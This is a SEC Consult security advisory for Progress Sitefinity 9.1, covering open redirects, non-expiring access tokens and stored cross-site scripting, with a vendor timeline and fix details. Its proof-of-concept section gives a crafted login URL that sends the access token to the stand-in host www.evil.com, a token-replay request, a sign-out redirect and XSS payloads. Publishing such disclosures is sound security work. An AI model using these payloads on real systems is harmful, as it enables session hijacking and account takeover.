Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSiddhartha TripathyPACKETSTORM:143894
HistoryAug 23, 2017 - 12:00 a.m.

Progress Sitefinity 9.1 XSS / Session Management / Open Redirect

2017-08-2300:00:00
Siddhartha Tripathy
packetstormsecurity.com
114
JSON
`SEC Consult Vulnerability Lab Security Advisory < 20170822-0 >  
=======================================================================  
title: Multiple vulnerabilities  
product: Progress Sitefinity  
vulnerable version: 9.1  
fixed version: 10.1  
CVE number: -  
impact: High  
homepage: http://www.sitefinity.com | https://www.progress.com  
found: 2016-10-21  
by: Siddhartha Tripathy & Mingshuo Li (Office Singapore)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Progress Sitefinity is a content management and marketing analytics  
platform designed to maximize the agility needed to succeed in todayas rapidly  
changing digital marketplace.  
It provides developers and IT teams the tools they need to support  
enterprise-level digital marketing, optimizing the customer journey by  
delivering seamless personalized experiences across different technologies and  
devices. Progress is a trusted source for the digital marketing innovation  
needed to create transformative customer experiences that fuel business  
success."  
  
Source: http://www.sitefinity.com/about  
  
  
Business recommendation:  
------------------------  
SEC Consult recommends applying the provided patches by the vendor immediately.  
  
Additionally, there are strong indications for further vulnerabilities and it  
is highly suggested to perform a thorough security review by security  
professionals to lower the risk of using this product.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Open Redirect Vulnerabilities  
Several scripts of Sitefinity are vulnerable to an open redirect. This  
vulnerability allows an attacker to redirect the victim to any site by using a  
manipulated link (e.g. a manipulated link in a phishing mail, forum or a  
guestbook). The redirection target could imitate the original site and might  
be used for phishing attacks or for running browser exploits to infect the  
victimas machine with malware. Because the server name in the manipulated link  
is identical to the original site, phishing attempts have a more trustworthy  
appearance.  
  
In the first instance of this vulnerability, the open redirect will forward  
an authentication token to the attacker controlled site, which can be abused  
by the attacker to initiate new sessions for the affected user.  
  
  
2) Broken Session Management  
During the authentication process, Sitefinity creates an authentication token  
"wrap_access_token", which is further used as a GET parameter to initiate a  
valid session if the supplied credentials have been verified to be correct.  
Transporting this token as GET parameter causes unnecessary exposure of the  
sensitive token, as it might end up in proxy or access logs.  
  
Furthermore, this token is not tied to the session ID and can be used to  
generate new valid sessions for the user, even if the initial session has been  
terminated by the user. The token will also survive a password change (e.g. if  
the user suspects misuse of his account) and can still be used to initiate new  
sessions. During the timeframe of testing, no expiry of the token could be  
observed. The wrap_access_token can thus be seen as a "Kerberos golden ticket"  
for Sitefinity.  
  
  
3) Permanent Cross-Site Scripting  
Multiple scripts do not properly sanitize/encode user input, which leads to  
permanent cross site scripting vulnerabilities. Furthermore, the web  
application allows users to upload HTML files, which are provided via the same  
domain, allowing an authenticated attacker to access arbitrary information and  
execute arbitrary functions of Sitefinity on behalf of other users. These  
vulnerabilities can be used by attackers to circumvent segregation of duties.  
  
  
Proof of concept:  
-----------------  
1a) Open Redirection with Access Token  
On the Sitefinity login site, the "realm" parameter will point the user to the  
actual location, once the user authenticates successfully. The parameter must  
start with the actual URL "http://www.example.com" to act as a valid  
destination. However, the filter can be circumvented by appending the at  
symbol ("%40", @) followed by an attacker controlled host name (e.g.  
"www.evil.com"). In this case, the original URL will be forwarded to the  
attacker controlled host as username.  
  
Successfully authenticating with the below URL will forward the victim to the  
attacker controlled host "www.evil.com"  
  
===============================================================================  
http://www.example.com/Sitefinity/Authenticate/SWT?realm=http:%2f%2fwww.example  
.com%40www.evil.com%2f&redirect_uri=%2fsitefinity%2f&deflate=true  
===============================================================================  
  
This vulnerability will not only redirect the user to arbitrary websites, but  
Sitefinity will also transmit the parameter "wrap_access_token" as GET  
parameter to the request. After successful authentication, the following  
request will be made to the attacker controlled host:  
  
===============================================================================  
GET /sitefinity/?wrap_deflated=true&wrap_access_token=vZPPbtd[...]AQ%3d%3d&wrap  
_access_token_expires_in=3600 HTTP/1.1  
===============================================================================  
  
The access token can be used by the attacker to create a valid session with  
Sitefinity for the victim user, by appending the obtained wrap_access_token to  
the following request:  
  
===============================================================================  
http://www.example.com/sitefinity/?wrap_deflated=true&wrap_access_token=vZPPbtd  
[...]AQ%3d%3d&wrap_access_token_expires_in=3600  
===============================================================================  
  
Furthermore, the wrap_access_token remains valid for an extended time (more  
than 24 hours during the test period) and can be used to create new sessions  
for the affected user even after the initial session was terminated by logging  
out or after the credentials have been changed (refer to vulnerability (2))  
  
  
1b) Open Redirection in the sign-out URL  
The parameter "ReturnUrl" of the sign-out function is vulnerable to open  
redirect. Calling the following request will redirect the victim user to an  
attacker controlled site after confirming the logout:  
  
===============================================================================  
http://www.example.com/sitefinity/signout/selflogout?ReturnUrl=//www.evil.com  
===============================================================================  
  
  
2) Broken Session Management  
After successful authentication, the following request including the parameter  
access_wrap_token will be made to the Sitefinity server:  
  
===============================================================================  
GET /sitefinity/?wrap_deflated=true&wrap_access_token=vZPPbtd[...]AQ%3d%3d&wrap  
_access_token_expires_in=3600 HTTP/1.1  
===============================================================================  
  
  
3a) Permanent Cross-Site Scripting in the Content Management Template Configuration  
In the Sitefinity content management area, there is a text box where users can  
insert text/html content. The user supplied input is not properly sanitized /  
encoded and executed in the context of Sitefinity. A simple proof-of-concept  
is provided below:  
  
===============================================================================  
<img alt="" src=x onerror=alert(document.cookie) />  
<svg/onload=prompt(1)>  
===============================================================================  
  
The following PUT request is used to persist the JavaScript/HTML code:  
  
===============================================================================  
PUT /Sitefinity/Services/DynamicModules/Data.svc/00000000-0000-0000-0000-000000  
000000/?itemType=Telerik.Sitefinity.DynamicTypes.Model.TemplateConfiguration.Te  
mplateconfiguration&providerName=OpenAccessProvider&managerType=Telerik.Sitefin  
ity.DynamicModules.DynamicModuleManager&provider=OpenAccessProvider&workflowOpe  
ration=Publish HTTP/1.1  
Host: www.example.com  
Cookie: [...snip...]  
Connection: close  
  
{"Item":{"__type":"Templateconfiguration:Telerik.Sitefinity.DynamicTypes.Model.  
TemplateConfiguration","ApprovalWorkflowState":{"PersistedValue":"","Value":""}  
,"Author":null,"AvailableLanguages":[],"DateCreated":"\/Date(1475201660265)\/",  
"Distance":0,"EmailContent":{"PersistedValue":"<img alt=\"\" onerror=\"alert(1)  
\" src=\"x\" />","Value":""},"EmailSubject":{"PersistedValue":"","Value":""},"E  
xpirationDate":null,"IncludeInSitemap":"true","IsDeletable":false,"IsEditable":  
false,"ItemDefaultUrl":{"PersistedValue":"","Value":""},"[...snip...]  
===============================================================================  
  
3b) Permanent Cross-Site Scripting via File Upload  
The Sitefinity content management area provides file upload functionality to  
the users. A user can upload related documents to the website. The application  
also supports uploading of HTML files. These HTML files are later displayed in  
the same domain as the Sitefinity application, which allows JavaScript code  
embedded in the HTML file to access arbitrary information and functionality of  
Sitefinity users viewing this crafted HTML file.  
  
  
3c) Permanent Cross-Site Scripting in the New User Creation form  
In the Sitefinity content management area an Administrator can create new  
users. In the New User Creation Page some parameters such as "Last name",  
"First name", and "About" are vulnerable to cross site scripting attacks. An  
attacker can inject malicious JavaScript payloads directly via the user  
interface.  
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following version of Progress Sitefinity has been tested which was the most  
recent version at the time of discovery: 9.1  
  
  
Vendor contact timeline:  
------------------------  
2016-10-21: Contacting vendor through support, requesting encrypted  
communication  
2016-10-25: Support team provides contact of Sitefinity Product Management  
2016-10-25: Sending unencrypted advisory to Sitefinity Porduct Management  
as requested by vendor  
2016-10-27: Vendor confirmed to "release a patch early next week" for the  
Open Redirect issues and XSS to be fixed in version 9.3 and 10.0.  
2016-11-02: Vendor sugguested mitigation on Broken Session Management.  
2017-03-14: Vendor releases version 10.0.  
2017-04-26: Vendor confirmed to implement XSS sanitizer in version 10.1.  
2017-04-27: Vendor confirmed Broken Session Management to be fixed in 10.0.  
2017-07-10: Vendor releases version 10.1.  
2017-08-22: Public release of security advisory  
  
  
Solution:  
---------  
According to the vendor, all the identified issues have been fixed in  
version 10.1.  
  
Please update to the latest version immediately.  
Vendor release notes: http://www.sitefinity.com/product/version-notes  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF S. Tripathy, M. Li / @2017  
  
`
JSON